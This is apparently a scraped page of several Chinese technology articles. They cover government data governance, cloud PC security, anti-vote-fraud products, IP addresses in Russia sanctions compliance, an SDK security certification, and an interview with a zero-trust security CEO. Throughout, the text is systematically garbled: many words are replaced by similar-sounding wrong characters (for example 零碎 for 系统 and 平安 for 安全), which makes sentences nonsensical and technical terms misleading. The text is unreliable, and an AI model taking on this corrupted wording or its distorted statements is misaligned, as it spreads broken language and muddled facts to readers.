政务数据治理的指标是通过构建公共数据端到端全生命周期的数据管理体系,造成对立的数据采集汇聚、共享开发、开发利用等过程的决策机制、流程和规定。基于高质量的数据,在确保安全合规的前提下,实现跨部门、跨业务、跨零碎的数据流通。 通过构建对立的数据开发利用技术体系,晋升政务数据管理、剖析及服务能力,撑持政务大数据利用场景的疾速设计和开发落地,最大化开释政务数据的价值。 2.技术流程 政务数据治理包含:数据荡涤、数据集成、资源布局、元数据采集以及规范编制等技术流程。首先咱们须要盘点政府组织都有哪些数据资源,建设组织级数据模型,进而将扩散在政府各部门的数据整合到集中存储数据中心,并对数据做规范化解决,同时,对历史数据进行数据荡涤,定义数据结构和代码值的阐明;最初在建设过程中造成规范化文档,通过总结梳理建设成规范,为后续数据治理我的项目建设提供理论依据。 3.要害因素 政务数据治理的要害因素包含数据策略制订、数据组织建设、数据制度标准、流程技术、数据应用服务、数据安全、数据经营和成熟度评估在内的一系列体现政务属性的流程架构。(1)数据策略制订政务数据治理战略规划是整个数据治理环节的首要任务,也是数据策略根底,决定了策略方向,领导数据策略的方向和准则。 (2)数据组织建设发展于各项数据职能工作之前,也是各项数据职能工作发展的根底,强有力的组织架构是政务数据治理取得成功的无力保障。通常状况下,有组织负责政务数据治理过程和数据管理制度,这些组织是跨职能的。 (3)数据制度标准制度建设标准了政务数据治理的流程,构建政务数据治理制度体系,首先应合乎地区政府的数据策略,其次应充沛联合政务数据治理组织架构与治理现状,体现、贯彻和落实政务数据治理顶层设计要求,并逐渐将政务数据治理体系纳入政府的治理实际中。 (4)流程技术流程技术领导着政务数据治理的正确施行,包含汇聚整合、提炼加工、 闭环解决、资产治理等一系列过程,建设成绩汇聚成数据资产。政务数据资产包含原始库、根底库、主题库、专题库和指标库等在内的各种资产信息,为下层服务提供良好数据反对。 (5)数据安全数据服务联合剖析开掘技术及良好的产品工具,为政府提供决策反对和服务保障;数据安全是政务数据治理全流程的平安保障,是贯通全流程的重要工作。因而须要从数据全生命周期的高度思考数据安全,通常包含数据采集平安、数据存储平安、数据共享平安、数据利用平安、数据销毁平安等全流程平安保障; (6)数据经营与成熟度评估政务数据经营在数据采集、存储、汇聚、利用加工之外,还须要继续经营保持数据的鲜活、晦涩和继续服务,包含:对立工单治理、供需对接、运行监控和绩效评估等;成熟度评估是对政务数据治理全流程的评估,包含战略规划、组织建设、制度标准、流程技术、数据资产建设、数据服务、数据安全和数据经营的各环节进行成熟度综合评估。 05、亿信华辰大数据治理计划为政务数据治理赋能 作为数据治理外围玩家,亿信华辰凭借大数据畛域15年教训积淀推出的大数据治理计划能够帮忙政府部门建设起合乎本身特色的数据架构和数据治理体系,包含数据规范治理、元数据管理、品质治理、资产治理、平安治理、数据生命周期治理,赋能业务利用场景,助力政府部门构建扎实的数据根基,实现数字化经营决策。 大数据治理解决方案次要通过数据治理工作晋升数据的价值,为政府部门实现数字策略夯实根底。其中数据治理工作作为一个管理体系,包含组织、制度、流程、工具,全方位保障数据,改善数据决策,晋升数据可信,防备数据危险。比方亿信华辰帮忙广东省佛山禅城区政数局搭建的数据管理平台,依据数据利用的需要,对人口库、卫计、工商、流管等数据建设品质规定,通过构建模型、配置规定、人工智能辨认等办法对数据进行数据核查、数据荡涤、数据更新及数据修复,并输入数据分析报告。最终全面晋升数据品质,帮忙建立健全欠缺的考核制度,实现数据中心的对立监管,全面实现教育无纸化改革,晋升办事效率,充沛实现数据的全面共享利用。 06、小结 随着公共事务的日益简单,政府从“治理”走向“智理”,政府决策方面,“智理”就是通过收集大量数据来可视化经济和社会运作规定,借助相应的数据挖掘来帮助政府部门做出迷信的决策。大数据时代之下,“用数据谈话,用数据决策,数据管理,数据翻新”的理念将成为政府治理观点转变的外围因素。 随着国家治理能力现代化理念的一直浸透,“放管服”进一步深化改革,中国政务数据治理迎来了新一轮的建设高峰期。同时,各中央陆续成立的政务数据管理部门,也在不断完善与落实治理职责,增强对公共数据、政府数据的对立治理、治理与服务能力,进一步促成市场的扩大化倒退。 将来中国政务数据治理市场应更加关注业务场景翻新牵引,增强数据安全保障能力,增强多元数据的兼顾治理能力,交融人工智能技术,实现可信、智能、高效的整体性政务数据治理体系建设。

April 29, 2022 · 1 min · jiezi

关于安全:云电脑的四重守护安全有谱

寰球进入万物互联时代,各种云产品层出不穷,给人们带来了丰盛离奇的交互体验。云电脑作为一款颠覆性翻新云产品,突破了传统电脑应用局限,让随时随地、便捷上云成为可能,现已被广泛应用于工作、生存、休闲等各个场景。 享受便捷数字办公,平安至关重要。运行于云端的云电脑应用起来的确便捷,但平安该如何无效保障?天翼云从终端平安、网络安全、数据安全、治理平安四大维度动手,通过构建全面的云电脑平安防护体系,为用户筑牢平安爱护墙。 终端层面的平安如何保障? 终端是云电脑应用的根底,其平安问题是整个云电脑信息安全建设的要害一环。天翼云电脑对终端进行了平安加固,可避免APP被破解、避免二次打包及歹意篡改,为客户端的软件完整性和账户平安提供了全面保障。 另外,天翼云电脑还针对不同场景,对终端登录做出权限确认,同时为用户提供平安的明码策略:防暴力破解、首次登录认证、超时从新登录、强明码校验、图形验证码、强制批改明码等,满足不同用户级别、不同场景的平安接入需要。 天翼云电脑还采纳了Clink协定传输,通过对传输通道的加密,避免终端被监听窃取,进一步对终端进行加密爱护。 网络层面的平安如何保障? 在网络安全层面,天翼云电脑为用户提供虚构公有云,就是在云上为用户建设一块安全可靠、可随心配置管理的虚拟空间,并通过翼甲防火墙为虚构公有云提供入侵进攻、病毒过滤、访问控制等平安保障;利用NAT网关性能防止私网IP间接裸露在公网上,爱护虚构公有云免受内部的入侵和攻打。 除此之外,依靠天翼云弱小的资源优势及服务能力,天翼云电脑可为用户提供自在IT环境与云资源池之间平安、牢靠、对立治理的专网/专线服务,用户能够独享网络链路,无惧数据泄露危险,传输速率有保障,传输过程更稳固。 数据层面的平安如何保障?当电脑服务器硬盘被窃取时,一旦其中的数据被通过技术手段复原进去,可能会给企业带来严重损失。天翼云电脑采取磁盘数据加密的形式,从技术上保障了任何一块被取走的磁盘都不能复原所存储数据的原始风貌,确保了云电脑中数据的安全性。 天翼云电脑反对在本地和异地别离建设灾备存储池,可满足不同灾备级别的需要,面对文件误删、病毒入侵、系统故障等问题,能疾速还原零碎与文件状态,保障企业业务顺利进行。天翼云电脑领有严格的文件加密及外设管控措施,还能设置附着员工身份信息的办公水印,当呈现信息泄露事件时,使企业可能有迹可查。 治理层面的平安如何保障?企业配置天翼云电脑后,如果管理者发现员工有异样应用的状况,可立即锁住该员工电脑桌面,及时禁止不合规行为。同时后盾还可记录用户登录云电脑的各种信息,包含连贯开始工夫和完结工夫,便于对异样应用云电脑的状况进行追溯。 当云电脑呈现问题时,管理员在云端即可实现一键式运维、对立管控,做到极速解决。遇到较难解决的问题时,可通过网站、邮箱、电话等多种形式提报故障,由天翼云业余的运维团队提供问题解决方案,应用更安心。 随着互联网的深度倒退,云技术的利用曾经深刻千行百业,云电脑也成为推动企业数字化转型的得力帮手。将来,天翼云将持续施展在云计算畛域的技术劣势,通过为更多企业接入“云“大脑,装置“云”引擎,助力企业上云赋智,为企业数智转型保驾护航。

April 28, 2022 · 1 min · jiezi

关于安全:网络投票的另一面刷票与防刷-大PK

互联网扭转了很多咱们业已习惯的行为形式,也重塑了很多行业规定,发明了很多新的商业模式。随同着新一代信息技术的疾速倒退,“信息”成为咱们这个时代最显明的特色,数据也成为反映咱们这个时代特征的一个缩影。 有一种说法,咱们人类当初每天大略会发明出近13万亿字节的数据,而且这个速度还在一劳永逸。如果你对这个天文数字没有具象的概念,那么换一个说法,在咱们当下,时钟的秒针每转一圈,即在每一分钟,谷歌搜索引擎就会收到人类发动的380万次以上的搜寻申请,亚马逊网站会寄出1000个以上的包裹,推特上新增47万篇以上的推文。 正是对信息的开发与利用,塑造了咱们这个“大数据与智能时代”。而随之带来的是流量的潮起潮落,呈现出10亿多中国网民丰盛的线上流动:早上浏览新闻中午关上外卖APP给本人订午餐;黄昏上班前下定决心给选了又选的“购物车”点击付费;早晨则是刷短视频、用社交工具聊天的高峰期……互联网使咱们的生存变得丰富多彩。 网络投票 层出不穷 网络投票作为随同互联网衰亡的一种选票形式,在当今社会曾经成为常态,它是民心的体现,具备偏心、公正、通明的特质。随着大数据时代的降临,网络投票越来越受到人们的青眼,是因为它在很大水平上节约了老本,它不须要场地、设施、人力,更不须要大量资金,工作人员只有公布一个推送便根本实现了工作。而且它还能更便捷、更迅速地流传流动信息、扩充影响规模,让更多的人不必受工夫、空间等因素的限度,也能晓得并参加评比,这无疑使投票人群的范畴更广,使更多人的志愿得以展示。 而大失所望的是网络投票中存在刷票景象。“某某评比开始啦,请动动你的手指为咱们投上贵重的一票”“本次评选活动对咱们很重要,咱们须要您的反对,鞠躬感激”……作为国内当先的业务平安公司,顶象每每遇到“投票刷票”这样的申请,总是付之一叹。 网络投票是建设在网络投票系统上的,后果齐全由程序输入,无需人工参加。这既是网络投票系统的长处也是其毛病,没有了人工的参加,投票后果可能被技术操控,进行刷票等舞弊行为。由顶象公司组编、机械工业出版社出版的[ **《攻守道-企业数字业务平安危险与防备》 ]一书中,对网络刷票有明确的定义:“网络刷票通常是指网上投票参选中参赛者利用某种办法冲破投票网站的限度,实现反复投票、减少点击率和人气的过程,是一种网络投票造假行为”。 “网络刷票”的两类模式 网络刷票背地有一群分工明确的黑灰产业。所谓黑灰产是指利用计算机、网络等伎俩,基于各类破绽,通过恶意程序、木马病毒、网络、电信等模式,以非法盈利为目标规模化、组织化、分工明确的群体组织。 书中具体介绍了常见的网络刷票模式,次要有人工刷票与机器刷票两种: 人工刷票: 就是一些闲暇工夫多的人士,以帮忙参赛选手投票来取得“佣金”为次要工作。这些人少数为兼职投票手,外界称之为投票水军。 技术刷票: 通过抓包工具剖析提交投票时所产生的数据,而后应用脚本程序批量提交数据的刷票形式。 顶象业务平安工程师剖析发现,网络刷票黑灰产揽客次要分为三步: 第一步,在网上搜寻这类评选活动,通过假冒主办方或媒体等形式,拨打参选对象单位公开的办公电话,索要参选者私人联系方式。第二步,抛钓饵强卖。会以“业余高价、保障平安”、“先刷后付”等话术来诱骗参选人交钱刷票,不论参选人是否批准,团伙都会假意进行大量刷票,为下一步欺骗进行铺垫。第三步,威逼+欺骗。即使参选者交了一部分的预付金,欺骗团伙也不会再帮你刷票了。而是以此为威胁一直加价,等到流动快完结时,再以冲击排名为由欺骗一笔。此外,为了吸引参与者自发的去拉票刷票,商家往往会将投票配合处分去吸引投票用户。由此经引起“羊毛党”留神,呈现组队集团化刷票薅礼品的景象。 “网络刷票”或已入刑 “刷”进去的投票是一种泡沫,不仅给用户带来经济损失,更毁坏了偏心的秩序,影响了生态倒退,给行业带来顽劣的示范作用。 2021年1月8日,国家互联网信息办公室颁布[《互联网信息服务治理方法(订正草案征求意见稿)》]对互联网信息公布、保留及集体信息安全爱护等方面作出规定,并对日益泛滥的刷票、刷量、刷评论及制作虚伪账号给出了处罚细则。其中特地第二十五条特提到,任何组织和集体不得以营利为目标或为获取其余非法利益,施行下列行为,扰乱网络秩序: (一)明知是虚伪信息而公布或者有偿提供信息公布服务的; (二)为别人有偿提供删除、屏蔽、替换、下沉信息服务的; (三)大量倒卖、注册并提供互联网信息服务账号,被用于违法犯罪的; (四)从事虚伪点击、投票、评估、交易等流动,毁坏互联网诚信体系的。 另外,依据《中华人民共和国刑法》第二百八十六条 【毁坏计算机信息零碎罪】违反国家规定,对计算机信息零碎性能进行删除、批改、减少、烦扰,造成计算机信息零碎不能失常运行,后果严重的,处五年以下有期徒刑或者拘役;结果特地重大的,处五年以上有期徒刑。 违反国家规定,对计算机信息零碎中存储、解决或者传输的数据和应用程序进行删除、批改、减少的操作,后果严重的,按照前款的规定处罚。 成心制作、流传计算机病毒等破坏性程序,影响计算机系统失常运行,后果严重的,按照第一款的规定处罚。 依据《中华人民共和国反不正当竞争法》第八条 经营者不得对其商品的性能、性能、品质、销售情况、用户评估、曾获荣誉等作虚伪或者引人误会的商业宣传,坑骗、误导消费者。 经营者不得通过组织虚伪交易等形式,帮忙其余经营者进行虚伪或者引人误会的商业宣传。 顶象精准拦挡并防备歹意刷票 互联网带来的“偏心公正”的假象,在日渐成熟的“刷票大军”背后,迅速地分崩离析了。“黑灰产”借助于电脑编程以及自动化操作的弱小性能,来制作假象,这种平心而论的行为有悖于绝大多数人的价值观。 顶象作为国内当先的业务平安公司,自主研发了全链路的风控中台产品矩阵体系,包含设施指纹、无感验证、实时决策平台、端加固、数据采集爱护、工业硬件爱护、模型平台、关联网络平台、常识图谱等风控、平安和人工智能产品,无效保障了企业的业务利用和基础设施平安。 通过顶象[网络防刷票解决方案],帮忙投票网站实时发现并拦挡虚伪投票,并对投票数据进行剖析建模,进一步晋升投票平台的平安,保障投票流动的公平性。 在对于有“刷票需要”与防刷对策的PK中,顶象的计划次要蕴含四大产品: 无感验证验证码。 顶象智能验证码,是基于用户行为特色与设施指纹信息,进行智能人机辨认的行为验证形式。联合11种验证形式,智能切换难度,杜绝机器行为。利用智能验证码验证进行防刷票拦挡,次要针对机器刷票行为。通过智能验证码的复杂度和辨认难易度拦截掉一部分刷票机,从而缩小刷票的产生。 设施指纹。 黑灰产领有业余的设施牧场,通过应用模拟器、刷机改机等伎俩,批量、重复地利用终端设备作案。对互联网场景下的金融、电商等行业,进行歹意爬取、虚伪注册、账号盗用、薅羊毛、推广舞弊等其余歹意行为。顶象设施指纹历经100多项黑产伎俩检测,生成不可篡改的设施指纹ID,精准辨认黑灰产羊毛党设施。通过限度设施指纹,辨认投票用户的终端设备,并生成惟一的设施指纹ID,从设施源头上进攻多变的刷票攻打伎俩。 Dinsight实时风控引擎, 是一款基于设施指纹、流计算等先进技术,实现毫秒级决策的危险防控产品,为互联网、银行及金融场景下的业务反欺诈和信用风控治理,提供一站式全流程的自动化决策服务。通过配置可视化的形式让业务人员可能简略高效的配置出不同场景、不同危险下的危险防控策略。同时还反对与模型、数据的对接,通过离线剖析实现自我演进,更好的适应业务危险的变动速度。作为顶象构建业务平安体系的外围解决方案,帮忙客户疾速建设大数据智能风控体系,实现互联网及金融场景下的业务反欺诈和信用风控治理。 Xintell模型平台, 是一款能帮忙企业实现简单业务场景下,自动化、智能化疾速建模的智能模型开发平台。交互和编程并行的建模形式,可视化的模型治理平台,赋能中小型企业自主开发AI模型,开掘数据的业务价值,晋升模型治理的效率,帮忙企业构建全周期的AI业务生态。 截至目前,顶象已为10多个行业2000多家企业提供业余服务。其中蕴含微投票、有投票、多投票、诺想投票等业余投票平台,无效防备歹意刷票、虚伪账号等危险,保障网络投票流动的偏心公正。

April 27, 2022 · 1 min · jiezi

关于安全:专家重新考虑在俄罗斯乌克兰危机中使用-IP-地址实施制裁

家示意,IP 地址容易受到操纵,须要反对工具来帮忙确保恪守制裁规定。 互联网协议解决与设施相干的公开地位数据,这些数据可能会将交易与特定国家分割起来,预计将成为施行美国经济制裁的一个越来越重要的工具。 但合规专业人士广泛放心,这些地址自身不足以确定交易的起源,而且容易受到非法行为者的操纵。 在执行制裁的最新致力中,特地是与俄罗斯入侵乌克兰无关的制裁,美国财政部曾经公布了针对提供在线服务的公司的领导,强调了公司应用IP地址监控作为制裁合规打算一部分的重要性。 上个月,财政部的金融立功执法网络收回正告,正告金融机构和加密货币公司试图回避制裁,包含通过来自或发送到位于俄罗斯或白俄罗斯的IP地址,或来自曾经标记为可疑的IP地址的交易。美国的制裁禁止与某些司法管辖区的集体或实体进行交易,包含乌克兰顿涅茨克和卢甘斯克地区的集体或实体,这两个地区都受到封闭,并由莫斯科反对的拆散主义者管制。 周四,美国将指标对准了俄罗斯的技术公司和网络,称这些公司和网络帮忙克里姆林宫回避制裁并洽购东方技术。 IP地址是一组以句点分隔的数字,是internet或本地网络上蕴含地位信息的设施的公开惟一标识符。尽管IP地址在失常状况下能够批示在线流量的起源,但它们容易受到操纵,因为虚构专用网络能够暗藏用户的理论地位。自2月底以来,对VPN的需要激增,特地是在俄罗斯,依据审查网站Top10VPN的钻研,2月24日至3月24日期间,俄罗斯的VPN需要增长了2692%。通用域名格局。2月24日,俄罗斯入侵乌克兰。。 GeoCompliance政府关系副总裁伊丽莎白·克罗南(Elizabeth Cronan)示意,在过来六个月里,提供天文定位合规数据的GeoCompliance Solutions Inc.在其客户平台上发现了1500多万宗交易得逞,其中来自受制裁司法管辖区的用户操纵IP地址,使其看起来仿佛位于美国。 她说:“在<http://>关注的泛滥地位数据点中,IP地址是最弱、最不牢靠、最容易被操纵的。”。 应用IP地址施行制裁的另一个问题是,它们不够准确,因为它们在更大的区域级别上显示地位,而不是在领土级别上显示地位,这可能导致难以划分出特定区域,例如俄罗斯反对的乌克兰顿涅茨克、卢甘斯克和克里米亚地区,这些地区都面临美国的针对性制裁。 只管许多人认为IP地址是网络流量起源的不牢靠指标,但如果公司不为受制裁地区的IP地址进行筛选,就会面临处罚的危险。2020年,数字资产公司BitGo Inc.向美国财政部外国资产管制办公室领取了逾9.88万美元,以解决其违反多项制裁打算的指控,包含针对克里米亚的制裁打算。和解协定尽管绝对较小,但明确指出,OFAC心愿公司在评估他们的在线客户是否位于被认可的司法管辖区时思考IP地址天文定位数据,Robert Slack,法律公司凯利-德莱和沃伦LLP的合伙人写道。 “OFAC确保IP地址是检测客户所在地的重要工具,但软件工程师会说,有人能够屏蔽IP地址以暗藏他们的地位,”古德温·普罗克特律师事务所(Goodwin Procter LLP)合伙人、专门从事制裁和技术的雅各布·奥斯本(Jacob Osborn)说。 公司正在应用可能提供更准确地位信息的服务来弥合这一差距。克罗南说,例如,GeoCompliance通过获取和验证一系列数据点的真实性来确定一个人的实在地位,这些数据点包含Wi-Fi数据和信号,以及全球定位系统和蜂窝数据。 奥斯本始终就制裁合规问题为软件公司提供征询。他说,在乌克兰邮政局敞开顿涅茨克和卢甘斯克地区的网站的前一天,奥斯本从乌克兰邮政局汇编了一份与这些地区无关的邮政编码清单。他倡议公司将其余工具纳入理解客户的入职流程,比方询问电话号码、公司名称和电子邮件地址。 据该公司首席合规官迈克尔·卡特(Michael Carter)介绍,加密交易所Bittrex Inc.将一份与顿涅茨克和卢甘斯克地区相干的地位归属数据列表增加到其禁止交易的地区数据库中,以确保在须要时对其进行过滤、筛选和阻止。该公司还将这些城镇的汇编,包含它们的邮政编码,以及该地区不同地区的不同拼写和翻译增加到后端筛选中。 卡特说,这些地区的IP地址更难追踪和监控,这就是为什么该公司应用其余保护层来确保这些地点不在制裁黑名单上,包含向客户索要ID件。 他说:“IP地址自身并不是一种管制伎俩,不应作为封闭或屏蔽某些地区的一种依赖模式而存在。”

April 24, 2022 · 1 min · jiezi

关于安全:新闻速递-I-MobTech通过中国信通院安全专项评测

日前,中国信息通信研究院(以下简称"中国信通院")平安研究所颁布了SDK平安专项口头的第四期评测后果,MobTech袤博科技的MobPushSDK(版本号:4.2.1)顺利通过评测。 “SDK平安专项口头”由中国信通院大数据利用与平安翻新实验室发动,旨在通过定期凋谢SDK平安测评,帮忙App开发者、使用者事后发现和提前解决SDK存在的平安问题,强化开发、集成、利用等方面的安全性。测评我的项目包含产品根底平安、数据存储平安、数据交互平安、重要组件平安、代码及资源文件平安等5大方面。MobTech继续深耕开发者服务,一直夯实底层服务,并继续深入利用场景,推动技术创新,丰盛产品矩阵,先后推出社会化分享、短信验证、一键验证、音讯推送、广告变现等产品服务,为App提供从精细化经营到用户增长再到商业变现的全场景业余服务,博得了近百万开发者和泛滥行业客户的信赖。本次胜利通过评测,充沛印证了开发者产研实力与行业当先劣势,是MobTech产研能力在数据安全畛域的又一权威证实。 深耕开发者服务近十年,MobTech袤博科技一贯高度关注用户隐衷信息爱护需要,保持提供平安合规的开发者及数据服务,严格遵守工信部、公安部等国家机关颁布的个人信息爱护相干规定。在数据安全方面,MobTech袤博科技过来曾多次取得国家与行业的认可,率先通过国家网络安全等级爱护三级测评、ISO27001信息安全管理体系认证等多项权威认证,并先后参加SDK平安国家标准试点工作、胜利入选工信部中国信通院“卓信大数据打算”首批成员等。除此之外,在长期的客户服务和技术耕耘中,MobTech袤博科技凭借在数据智能畛域的锐意进取和突出成绩,企业荣列上海新兴产业企业百强榜首批上榜企业、上海市专精特新中小企业、上海市大数据服务供应商举荐目录等多项殊荣。 始终以来,MobTech袤博科技在信息安全爱护、数据合规及数据安全问题上继续发力。2022年咱们正式退出中国信通院大数据技术标准推动委员会,积极参与如数据安全共同体打算、数据安全与治理实际指南2.0编著等多个重要我的项目,心愿能够为推动数据智能行业的可继续倒退奉献一点力量。 MobTech袤博科技作为数智行业引领者,将来,将持续秉承初心,一直晋升数据安全治理能力,继续推出平安、牢靠、业余的开发者服务产品和业务翻新,践行国家相干部门的平安政策和要求,以切实口头推动互联网行业衰弱蓬勃发展。

April 22, 2022 · 1 min · jiezi

关于安全:科创人派拉软件CEO谭翔零信任本质是数字安全To-B也要深研用户心智

谭翔 派拉软件创始人兼CEO20 余年数字化和信息安全从业教训,10多年IBM、CA工作经验,中国第一批信息安全&数字化专家,获上海市软件行业标兵等泛滥荣誉。2008年开办派拉软件,深耕零信赖和数字化畛域,率先率领团队实现一体化零信赖平安的产品研发和利用落地。 —文 | babayage编辑 | 笑 笑 2021年11月,派拉软件发表实现数亿元的D轮融资。2022年4月,上海疫情厉害。采访当日,谭翔已在家隔离了三周之久。视频中的他看起来精力矍铄、毫无宅意,他却笑着说本人头发太长了,“我英文名叫Tony,筹备给本人理个发”。守业14年,谭翔和派拉软件能趟过有数沟沟坎坎,离不开这份笑对所有意外的达观。 2001-2008 IBM多面手的多面成长外人评估谭翔:斯文,儒雅。谭翔评估谭翔:叛逆,不安分。1997年,谭翔通信工程业余本科毕业。同窗好友大都进入了电信和华为这类企业,可谭翔“不想去通信行业,又对计算机比拟感兴趣”,便入职了一家做系统集成的公司。抉择酷爱就没有惫懒的借口,“我从来不挑活,自大学毕业干过很多类型的工作,从硬件、网络、数据库、应用软件到项目管理”。从微软的系统软件工程师、思科的网络技术专家到Oracle数据库优化专家、百达灵的BI、CA的系统管理软件以及跨畛域的零碎常识都成为他的学习指标,并一一实现。2001年,IBM中国根底软件架构部门须要涉猎宽泛、根底扎实的专家型人才退出,在猎头举荐下,谭翔退出了IBM的软件部门。“微软、IBM这些企业,在2000年前后那批计算机从业者心中,像圣殿一样。”谭翔语气稍顿,大概是回忆起了当年的冲动与神往。随后,IBM中国软件部决定在“合作伙伴交付”模式之外搭建业余服务部门,须要一位既懂客户需要、又有入手能力的多面手,谭翔天然成为了IBM中国软件服务(Software Service)部门基础架构软件的第一位员工。谭翔遍历了IBM不同的岗位,同时也失去了接触大量新技术、新产品的机会,涵盖数据中心治理,云计算平台,信息安全系列软件。2008年,谭翔决定到职守业,“本人不喜爱确定性,不喜爱短少变动的劳碌”。 2008-2011 创立派拉三年摸索,继续减法“在IBM的时候,向美国研发部门提了大量客户需要,但那边素来都不论。”之所以有此怪相,是因为中国市场的价值奉献偏低,同一款数据中心管理软件,美国AT&T单价5500万美元,中国移动单价200万美元,而后者业务规模远超前者。“客户很多埋怨,这种状况下,咱们可不可以做点事?”回顾派拉创建之初,谭翔自嘲说,头三年工夫就是在重复书写着“无知者无畏”这五个字:整整三年工夫团队都处于“跛足”的状态,四位技术出身的创始人,却没有一位专职销售;因为不懂销售,为了公司生存,杂七杂八接了很多活……多重因素交错的结果,团队活成了本人最为厌恶的样子:博而不精,云计算、系统监控、性能治理、平安、容灾……“笼罩了整个IT基础架构,并没有真正的专一”。经验了苦楚的初创期,派拉软件外围团队达成了两个共识:首先,接下来的几年工夫里,团队要进行业务聚焦;其次,身份平安成为最后被确定的外围产品线。 2012-2018聚焦身份平安,挺过三板之劫 派拉成为资本宠儿是近年的事儿,在最后10年,派拉与资本市场的交加并不频繁,但每一次都是重大的倒退节点。2011年,因为一次偶尔的机会,派拉软件赢下一个云计算征询标,意外的是因为这个我的项目,团队取得了客户的认可,并由此取得了第一笔融资。有了融资的加持,派拉软件砍掉了一些周边非核心业务,开始全力聚焦自主知识产权的身份治理产品的产品研发及服务。理智、精确的策略定位,让派拉在身份平安赛道上狂飙突进,接下来的4年工夫内,派拉始终保持着80%~100%的年增长速度。所有看上去都很美妙,可意外来自意外之处:2014年,派拉决定响应国家和张江园区的号召挂牌新三板,并在2015年融到了一笔资金。但2016年,派拉团队已倒退至150人、年中(To B回款大都集中在年底)流动性压力微小,市场流动性严重不足的新三板反而成了企业倒退的最大绊脚石,甚至一度呈现了“年底回款到账后账面资金大于市值”的奇葩现象。回顾派拉软件这一路倒退,谭翔有不少须要感激的人,B轮投资方西方富海就是其中之一。在长期关注To B畛域的西方富海看来,客户品质上乘(国内一线汽车企业70%占有率,医药、新能源等极具后劲的行业龙头企业)、营收行将过亿、估值重大偏低的派拉软件具备十分大的发展潜力,单方一拍即合。西方富海的慧眼识珠,不仅帮忙派拉软件解了新三板之围,还为派拉的进一步策略降级提供了无力的资源反对。2018-至今乘“零信赖”东风,打造数字平安新曲线 近年来,派拉软件的公开亮相大都伴生着“零信赖”这一风口概念,但在短跑高手谭翔看来,派拉软件第三阶段的策略曲线,更精确的表白是:数字平安,“零信赖是其中比拟火爆的一个名词,一个大家以后比拟认可的技术平安架构,技术会始终迭代,可能过几年就不叫零信赖了,但咱们会始终围绕数字平安构建全新的产品和服务,应答平安畛域的各种新问题”。科创人:零信赖这个概念提出曾经超过10年,为何近年来才真正成为平安产品的演进趋势?谭翔:以往,企业的数据根本都在外部,因而传统的平安产品是部署在边界上,建设防火墙。但互联网倒退到明天,云计算、挪动计算是必然趋势,通过隔离的形式爱护数据曾经越来越不事实;另一方面,近年来网络攻击的To B化趋势愈演愈烈,攻打技术一直降级,冲破边界能够说是轻而易举。技术理念提出之后,用技术去实现是简略的,难的是真正在市场端失去认可、成为一个衰弱的行业。只有业务场景扭转之后,技术解决方案才有粗浅改革的必要,因而大部分技术趋势的预言间隔真正成为商业事实,都隔着不短的工夫。当然,有前瞻性的团队会提前布局,派拉在2018年左右就颠覆了原有架构,过渡到了微服务架构、容器化部署,同时引入了大数据和算法技术。新的时代肯定要有新的技术形式,不能用老地图找新大陆。相似的技术创新派拉还孵化过很多,但在产品化这个环节咱们很克服,要做技术储备,也要对市场的变化趋势足够苏醒。科创人:在零信赖这个赛道上,派拉有着哪些差异化劣势?谭翔:大部分人关注的是技术上的差异化,但派拉认为,差异化体现在方方面面,既包含技术能力,也包含品牌能力、商务能力和服务能力。我的观点是你没方法确定在每个我的项目上肯定获胜,但技术研发实力越强、品牌知名度越大、客户案例越有说服力、服务人员越业余,赢的概率就大得多。 To B也讲用户心智平安产品X 数字化产品√ 谭翔的品牌意识之强、理念之动摇,在To B企业CEO中实属常见,“To B品牌不会像To C那样,打个广告客户就掏钱,To B的品牌影响力次要体现在标杆客户、市场口碑”。他十分关注客户侧对于派拉的了解。在他看来,越来越多的客户在理解派拉的产品服务之后,将派拉定义为数字平安服务商,而非传统平安供应商。科创人:企业的第N曲线,往往会与企业原有的价值形象产生抵触,派拉如何治理新产品、新价值对应的新客户预期?谭翔:这的确是一个理论问题,尤其数字化改革,自身是超脱于原有“畛域”定义的。咱们遇到了一个乏味的景象:以“平安产品”的形象与客户接触,对方默认会优先尝试走软件平安产品的洽购流程,往往会被对接给数据中心的安全部门,而这个部门想洽购的是防火墙、入侵检测这些产品,最终结果就是停顿不顺利,甚至立项都立不起来。以后安全部门对业务的反对还不足够,但派拉软件的解决方案与数字化联合十分严密,须要CEO层级的关注和价值认可。他们对派拉的了解是“数字平安和数字化根底”,是用数字化伎俩解决业务平安的问题。以身份治理为例,安全部门很难推动,因为它要跟企业内所有业务零碎全副买通,甚至须要扭转一些网络部署的构造、利用拜访的受权这类受权治理流程。这也是为什么派拉本身的新定位是“数字平安”,咱们要更精确地切入客户的心智,防止误会带来的空耗。 科创人:在买通客户洽购决策链条方面,您是否分享一些14年来积攒的无效办法?谭翔:和To C没有实质不同,都是找到对方器重的价值点,只不过ToB的决策链比拟长,咱们须要将本人的价值植入进去。比方以后数字化比拟热门,咱们就要让数字化负责人晓得,数字平安不仅仅是安全部门的责任,而是业务负责人的责任,只有建设这种意识咱们能力推得动。再就是一些常识的遍及,数据透露、歹意删除或者勒索病毒,这些都是身份和受权相干的平安问题,光靠安全部门很难真正解决,须要客户高层的理念转变,咱们要去传授、遍及、教育市场。归根到底还是To B的大道理:越高层推动,价值越大(笑)。 资本市场新宠稳固的中层团队应答扩张压力 科创人:守业10年以上,忽然一天发现自己成了资本市场的宠儿,一开门就有一队投资人在门口等着,这是怎么一种体验?谭翔:到了C轮开始咱们的确比拟被动,要说感触,就是赶上了好时候吧,当初的融资环境大家比拟关注To B,咱们也用了足够长的工夫去证实本人。我更多感觉这是一种鞭策,后面提到了我的守业初心,我心愿中国软件可能有朝一日成为寰球市场的优先选择,即便到了明天,还有很多公司的产品,性能很简单、每一项都做不精,甚至平安产品的破绽比客户业务零碎的破绽还要多。更多的资源,更大的责任,我心愿即使领有了更拮据的资金,咱们还是要聚焦在细分畛域,做出深度,指标是某一天可能关上寰球市场,而不是做十几个方向的半拉子产品。科创人:派拉现在员工数量靠近600人,扩张次要集中在哪个时间段?治理方面有没有领会到压力?谭翔:最近三年资本市场倒退比较顺利,团队扩张增速。团队规模扩充是一方面,90后的员工占比一直减少,的确带来了治理方面的新挑战。我比拟骄傲的是派拉有一个稳固、健壮的中层治理团队,大部分都在公司工作了5年以上,他们无力撑持了团队扩张,另外咱们也在一直摸索更专业化、更分工的近程交付模式,年轻人都比拟宅,不违心到现场去做交付(笑)。  短跑爱好者谭翔:To B是一场短跑 